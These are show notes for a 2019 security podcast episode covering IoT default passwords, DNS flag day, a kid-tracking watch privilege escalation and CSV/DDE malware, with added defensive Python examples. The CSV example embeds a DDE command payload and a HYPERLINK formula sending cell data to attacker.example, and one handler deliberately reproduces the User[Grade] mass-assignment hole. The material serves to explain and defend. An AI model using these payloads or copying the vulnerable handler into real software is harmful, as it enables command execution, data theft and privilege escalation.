IOT, DDOS, ICS security

Japan, Imperva, & DDoS – Paul’s Security Weekly #592

February 1, 2019



In the Security News: 5 tips for access control from an ethical hacker, Japan is to hunt down citizens' insecure IoT devices, kid-tracking watches allow attackers to monitor real-time location data, and Imperva mitigated a DDoS attack that generated 500 million packets per second!

Paul's Stories

  1. 5 Tips for Access Control Cybersecurity from an Ethical Hacker - Not all that different from security tips for your "regular" IT infrastructure: No Default Passwords – Take them out, everywhere. They’re in the documentation, they’re easy to find on the internet and the script to compromise them is easy to write. Keep Testing – Not interoperability testing. As a hacker, it doesn’t matter if you can integrate with different equipment. These devices need to be locked down, with strong passwords and proper equipment. If you don’t have the right staff, it’s alright. You can hire a consultant for what you need, and be safe moving forward with your typical staff once they leave. Vulnerability Tracking and Reporting – If you don’t have a process for this, there are many resources on the IT side on how to do this. You don’t have to reinvent the wheel. There will be vulnerabilities in everything — there is no shame in reporting them, but there is shame in keeping quiet about them. Know Your Hardware’s Software – A lot of hardware platforms ride on code from something else. Your engineer didn’t write them, they’re open source or free. The problem with this — although it saves you money on development — it also means you inherit the vulnerabilities from the code the engineer borrowed. Update Awareness Programs – If they’re the same slides you’ve made your employees look at every year, update them. Employees are your biggest vulnerability. They will be targeted. If you don’t properly train them, they will pose a risk to your organization regardless of what you do with the technology.
  2. Ready for DNS Flag Day? - Security Boulevard - The minimal working setup which will allow your domain to survive 2019 DNS flag day must not have a timeout result in any of the plain DNS and EDNS version 0 tests implemented in the ednscomp tool. Failures of the EDNS(1) tests will not cause any immediate problem.
  3. Cheating Attempts and the OSCP - When most people think of cheating, they think of having an answer sheet. Most often, individuals resort to buying the answers from someone else and just apply them to the exam. When this happens, we have a series of controls to deal with it. The other, less thought about, type of cheating is individuals simply claiming that they have the certification when they don’t. This one is easier to deal with as individuals just need to validate the certification. Last year, we rolled out our Acclaim Digital Badges, which have been very well received in the community. We also have a documented process on how to work directly with us to validate certifications.
  4. The Problem with Throwing Away a Smart Device - Hackster Blog - In a very short space of time the teardown established that if you’ve connected the bulb to your Wi-Fi network then your network password will be stored in plain text on the bulb, and can be easily recovered just by downloading the firmware and inspecting it using a hex editor.
  5. Japan to Hunt Down Citizens Insecure IoT Devices - The country’s National Institute of Information and Communications Technology (NICT) has been tasked by the Ministry of Internal Affairs and Communications to carry out a “survey” of 200 million deployed IoT devices, starting with routers and web cams. A team of NICT white-hats will try to log into internet-discoverable devices using default credentials and a list of overused and easy-to-guess passwords. When insecure devices are uncovered, ISPs and local authorities will be notified, so they can work with impacted consumers and businesses to lock them down.
  6. Kid-Tracking Watches Allow Attackers to Monitor Real-Time Location Data - This was much worse than I thought: At issue was an easy-to-exploit, severe privilege-escalation vulnerability: The system failed to validate that the user had the appropriate permission to take admin control. An attacker with access to the watch’s credentials simply needed to change the user level parameter in the backend to an admin designation, which would provide access to all account information and all watch information. More specifically, the Gator works with a web login panel. Using a simple web proxy, the Pen Test Partners team was able to review requests being sent to the website – which included a “User[Grade]” parameter. Stykas simply guessed that this designates the level of privilege for the user and decided to play around with it. “I changed the value to two and nothing happened, BUT change it to zero and you get platform admin,” he said.
  7. Prepare to Defend Your Network Against Swarm-as-a-Service - For example, a new methodology was announced by scientists in Hong Kong that uses natural swarm behaviors to control clusters of nano-robots. These micro-swarms can be directed to perform precise structural changes with a high degree of reconfigurability, such as extending, shrinking, splitting and merging. Lots of hype in this one, but I can't help but think about Black Mirror.
  8. Exclusive: spreading CSV Malware via Google Sheets - Interesting as using Google Sheets to share it bypasses many protections: Finally an attacker could send a clear link over an instant message platform and/or over eMail asking to open up a Google Sheets suggesting to the victim to open the spreadsheet locally since “MSExcel compatibility issues”. At that time if the victim downloads the Google sheets and opens up locally (with Microsoft), the attacker might infect her box. Also, the ability to execute DDE in a .csv is interesting.
  9. Researchers published the PoC exploit code for Linux SystemD bugs - Nick and the team at Capsule8 are awesome, check out their blog for the PoC code that Qualys didn't publish!
  10. Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever - Earlier this month, the cyber security software and services company Imperva mitigated an attack against one of its clients that exceeded 500 million packets per second. This attack was a SYN flood DDoS and it is the largest DDoS attack by packet volume ever observed.
  11. New Mac malware steals cookies, cryptocurrency and computing power - Help Net Security
  12. 8 Cybersecurity Myths Debunked - Myth 1: You're Too Small to Be Attacked Myth 2: Passwords Are Good Enough Myth 3: Antivirus Is Good Enough Myth 4: It's IT's Problem Myth 5: BYOD is Safe Myth 6: Total Security Is Possible Myth 7: You Don't Need Assessments and Tests Myth 8: Threats Are Only External
  13. Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory
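
The DNS Flag Day item (story 2) talks about the plain DNS, EDNS version 0 and EDNS version 1 probes without showing what those probes contain. The following is an added example, not code from the article or from ISC's ednscomp tool: it builds the three probe messages on the wire (RFC 6891 OPT pseudo-RR), parses a reply, and grades it with a simplified version of the flag-day rule quoted above, i.e. only a missing answer to the plain or EDNS0 probe counts as a failure, while an EDNS1 probe that is not answered with BADVERS is merely a warning. The grading thresholds and the constructed replies in the test are assumptions; to probe a real server you would send `build_message(...)` over a UDP socket and pass the reply (or `None` on timeout) to `classify`.

```python
import struct

OPT_TYPE = 41        # EDNS OPT pseudo-RR type (RFC 6891)
RCODE_FORMERR = 1
RCODE_BADVERS = 16   # extended RCODE: OPT ext-rcode 1 << 4 | header RCODE 0


def _encode_name(name):
    if name in ("", "."):
        return b"\x00"
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_message(qname, *, txid=0x1234, qr=False, rcode=0,
                  edns_version=None, ext_rcode=0, udp_size=4096):
    """Build a minimal one-question DNS message (QTYPE=A, QCLASS=IN).
    If edns_version is given, append an OPT RR in the additional section."""
    flags = (0x8000 if qr else 0) | 0x0100 | (rcode & 0xF)   # QR, RD, 4-bit RCODE
    arcount = 1 if edns_version is not None else 0
    msg = struct.pack(">HHHHHH", txid, flags, 1, 0, 0, arcount)
    msg += _encode_name(qname) + struct.pack(">HH", 1, 1)
    if edns_version is not None:
        # OPT RR layout: NAME=root, TYPE=41, CLASS=UDP payload size,
        # TTL = ext-rcode(8) | version(8) | DO + Z(16), RDLENGTH=0 (no options)
        ttl = ((ext_rcode & 0xFF) << 24) | ((edns_version & 0xFF) << 16)
        msg += b"\x00" + struct.pack(">HHIH", OPT_TYPE, udp_size, ttl, 0)
    return msg


def _skip_name(msg, off):
    """Advance past a (possibly compressed) domain name."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:        # compression pointer terminates the name
            return off + 2
        off += 1 + length


def parse_message(msg):
    """Return the header fields plus the OPT RR (if any) of a DNS message."""
    txid, flags, qd, an, ns, ar = struct.unpack_from(">HHHHHH", msg, 0)
    off = 12
    for _ in range(qd):
        off = _skip_name(msg, off) + 4               # QTYPE + QCLASS
    opt = None
    for _ in range(an + ns + ar):
        off = _skip_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack_from(">HHIH", msg, off)
        off += 10 + rdlen
        if rtype == OPT_TYPE:
            opt = {"udp_size": rclass, "ext_rcode": ttl >> 24,
                   "version": (ttl >> 16) & 0xFF}
    rcode = flags & 0xF
    if opt is not None:
        rcode |= opt["ext_rcode"] << 4               # 12-bit extended RCODE
    return {"txid": txid, "qr": bool(flags & 0x8000), "rcode": rcode, "opt": opt}


def classify(test, query, response):
    """Grade one probe: test is 'plain' (no OPT), 'edns0' or 'edns1'.
    Simplified flag-day rule (assumption): only no answer at all to the plain
    or EDNS0 probe is 'fail'; every other shortcoming is 'warn'."""
    if response is None:                             # timed out
        return "warn" if test == "edns1" else "fail"
    q, r = parse_message(query), parse_message(response)
    if not r["qr"] or r["txid"] != q["txid"]:
        return "fail"                                # not an answer to our query
    if test == "plain":
        return "pass"
    if test == "edns0":
        ok = (r["opt"] is not None and r["opt"]["version"] == 0
              and r["rcode"] != RCODE_FORMERR)
        return "pass" if ok else "warn"              # answered, but without EDNS
    if test == "edns1":
        # RFC 6891: an unsupported EDNS version must be answered with BADVERS
        ok = r["opt"] is not None and r["rcode"] == RCODE_BADVERS
        return "pass" if ok else "warn"
    raise ValueError(f"unknown test {test!r}")
```

A server that answers the EDNS0 probe with FORMERR or with no OPT record is still "alive" under the minimal rule, because the flag-day change only removes the resolver-side retry after a timeout; that is why such replies grade as warnings rather than failures here.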
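
The Gator watch item (story 6) describes a backend that let the client set its own privilege level through a `User[Grade]` form field. The following is an added example, not code from the vendor's platform or from the Pen Test Partners write-up: a constructed in-memory backend with a handler that behaves as the article describes (every `User[...]` field is written straight into the account) beside a hardened handler that allow-lists writable fields and never reads the grade from the request. The `User[Grade]` parameter name and the fact that the value 0 meant platform admin come from the article; the grade constants, account table, field names and return values are assumptions for illustration.

```python
from urllib.parse import parse_qsl

# Assumed meaning of the User[Grade] values, based only on the article's report
# that 0 unlocked platform admin. Everything else here is a constructed backend.
GRADE_PLATFORM_ADMIN = 0
GRADE_PARENT = 1
ALLOWED_PROFILE_FIELDS = {"name", "phone"}      # fields a user may edit about themselves


def make_users():
    """Constructed account table: two parents, each with one watch."""
    return {"alice": {"grade": GRADE_PARENT, "watches": ["W-1001"]},
            "bob":   {"grade": GRADE_PARENT, "watches": ["W-2002"]}}


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body such as the one the
    researchers edited in a web proxy: 'User[Grade]=0&User[Name]=Alice'."""
    return dict(parse_qsl(body, keep_blank_values=True))


def _field(key):
    """'User[Grade]' -> 'grade'; None for keys outside the User[...] namespace."""
    return key[5:-1].lower() if key.startswith("User[") and key.endswith("]") else None


def update_profile_vulnerable(users, session_user, form):
    """The behaviour the article describes: every User[*] parameter is written
    straight into the account, so User[Grade]=0 makes the caller an admin."""
    user = users[session_user]
    for key, value in form.items():
        field = _field(key)
        if field is not None:
            user[field] = int(value) if value.isdigit() else value
    return user["grade"]


def update_profile_fixed(users, session_user, form):
    """Hardened handler: writable fields are allow-listed and checked before
    anything is stored; grade is server-owned and is never read from the client."""
    updates = {}
    for key, value in form.items():
        field = _field(key)
        if field not in ALLOWED_PROFILE_FIELDS:
            return f"rejected: {key}"              # nothing is written on a bad request
        updates[field] = value
    users[session_user].update(updates)
    return "ok"


def list_watches(users, session_user):
    """Authorization decision driven by the stored grade: a platform admin sees
    every watch on the service, everyone else only their own."""
    user = users[session_user]
    if user["grade"] == GRADE_PLATFORM_ADMIN:
        return sorted(w for u in users.values() for w in u["watches"])
    return list(user["watches"])
```

The fix is the allow-list, not a denylist of "Grade": any field that carries authorization state (role, grade, tenant, owner) has to be derived from the server's session and record, and a request that tries to set it should be rejected as a whole rather than silently dropped, so that the attempt shows up in logs.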
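
The Google Sheets item (story 8) notes that DDE in a `.csv` is interesting: a CSV file has no formulas of its own, but a spreadsheet application evaluates any cell that starts with `=`, `+`, `-` or `@`, so a downloaded sheet can carry a command. The following is an added example, not code from the article: a scanner that flags cells that would be evaluated (separating the DDE `server|topic!item` shape from other formulas) and a sanitizer that makes an exported CSV inert. The sample file and its payloads are constructed for the example; the DDE cell uses the widely published harmless `calc` form, and the classification regexes are assumptions, not a complete grammar of what Excel accepts.

```python
import csv
import io
import re

FORMULA_TRIGGERS = ("=", "+", "-", "@")
# DDE shape seen in the wild, e.g. =cmd|' /C calc'!A0 : trigger, server name,
# '|', topic/command, '!' item reference.
DDE_RE = re.compile(r"^[=+\-@]\s*\w+\s*\|.*!\w+", re.I)
NUMERIC_RE = re.compile(r"[+-]?\d+(\.\d+)?")

# Constructed sample: a benign row, a DDE payload, a genuine negative number
# and a HYPERLINK-based exfiltration formula.
SAMPLE_CSV = (
    "name,amount,note\n"
    "alice,10,ok\n"
    "\"=cmd|' /C calc'!A0\",20,dde payload\n"
    "-5,3,negative number\n"
    "\"=HYPERLINK(\"\"http://attacker.example/?\"\"&B2,\"\"open\"\")\",1,exfil\n"
)


def is_numeric(cell):
    return NUMERIC_RE.fullmatch(cell.strip()) is not None


def is_formula(cell):
    """A cell a spreadsheet would evaluate: leading =, +, -, @ (also after a
    tab or CR), unless it is just a signed number."""
    stripped = cell.lstrip(" \t\r")
    return stripped.startswith(FORMULA_TRIGGERS) and not is_numeric(stripped)


def is_dde(cell):
    return DDE_RE.match(cell.lstrip(" \t\r")) is not None


def scan_csv(text):
    """Return (row, column, kind, cell) for every cell that would be evaluated
    when the CSV is opened in a spreadsheet."""
    findings = []
    for row_no, row in enumerate(csv.reader(io.StringIO(text)), 1):
        for col_no, cell in enumerate(row, 1):
            if is_formula(cell):
                kind = "dde" if is_dde(cell) else "formula"
                findings.append((row_no, col_no, kind, cell))
    return findings


def neutralize(cell):
    """Make a cell inert: replace tab/CR (they can start a formula after a
    separator) and prefix formula-looking text with a quote so it is kept as
    literal text. Plain signed numbers are left alone."""
    cell = cell.replace("\t", " ").replace("\r", " ")
    return "'" + cell if is_formula(cell) else cell


def sanitize_csv(text):
    """Rewrite a CSV so no cell is evaluated when opened; csv.writer re-quotes
    fields that contain commas or double quotes."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    for row in csv.reader(io.StringIO(text)):
        writer.writerow([neutralize(cell) for cell in row])
    return out.getvalue()
```

The numeric exception is the usual trade-off: a bare `-5` is a negative number to a user and a formula-starting cell to the parser, so the sanitizer leaves signed numbers alone and quotes everything else. Run `scan_csv` on inbound files before anyone opens them locally, and `sanitize_csv` on anything your own application exports.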

Lee's Stories

  1. FaceTime Group Chat bug allows eavesdropping - Apple disabled group chat; a fix is due this week. Will it be server or client, and how to test?
  2. Tool to find vulnerable robots released - The tool, "Aztarna", written in Python, detects vulnerable robots (and routers) connected to the internet. This is here because robots.
  3. MS terminates support for IE 10 - IE 10 and Windows 7 now have 2020 termination dates.
  4. Most Fortune 100 companies still using vulnerable Struts versions - Same vulnerable version as Equifax used. Learning from others' misfortune is important.
  5. IoT functions added to Balboa Water Group hot tubs without security - The tub uses an open hotspot, a shared cloud account and a management ID derived from the hotspot MAC address. A hacker could locate the SSID, change the water temperature, and detect jet state to determine when the tub is in use.

Full Show Notes

Follow us on Twitter:


Paul Asadorian - CEO, Security Weekly.

Jeff Man - Sr. InfoSec Consultant, Online Business Systems.

Lee Neely - Senior Cyber Analyst, Lawrence Livermore National Laboratory.


  • RSA Conference 2019 is coming up March 4 - 8 in San Francisco! Go to to register now using the discount code 5U9SWFD to receive $100 off a full conference pass! If you are interested in booking an interview or briefing with Security Weekly, please go to to submit your request!
  • Join us April 1-3, at Disney's Contemporary Resort for InfoSec World 2019 where you can connect and network with like-minded individuals in search of actionable information. Visit and use the registration code OS19-SECWEEK for 15% off the Main Conference or World Pass. If you are interested in booking an interview or briefing with Security Weekly, please go to to submit your request!

